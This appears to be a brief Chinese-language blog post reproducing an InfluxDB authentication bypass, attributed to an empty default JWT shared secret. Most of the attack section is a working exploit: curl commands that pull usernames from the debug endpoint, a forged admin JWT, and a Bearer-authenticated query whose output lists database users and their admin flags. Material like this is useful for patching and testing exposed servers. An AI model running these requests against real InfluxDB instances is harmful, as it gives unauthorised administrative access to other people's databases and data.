0day复现步骤:

1. 查找user name

curl -G "http://xxx:8086/debug/requests"

2. 构造jwt token

jwt_token

3. 构造认证头

curl -G 'http://xxx:8086/query' --data-urlencode 'q=show users' -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNTU5Mjg0OTM1fQ.tUClNot9LgStSw57n26DSn-3NPkBiHizk-XOHMfJJJw'

{"results":[{"statement_id":0,"series":[{"columns":["user","admin"],"values":[["admin",true],["read",false],["write",false],["telegraf",true]]}]}]}

成功

漏洞原理

JWT token shared-secret 默认为空

JWT说明

0day原文

influxdb认证绕过0day

通过jwt token绕过认证

0day复现步骤:

1. 查找user name

2. 构造jwt token

3. 构造认证头

漏洞原理

CATALOG

FEATURED TAGS

FRIENDS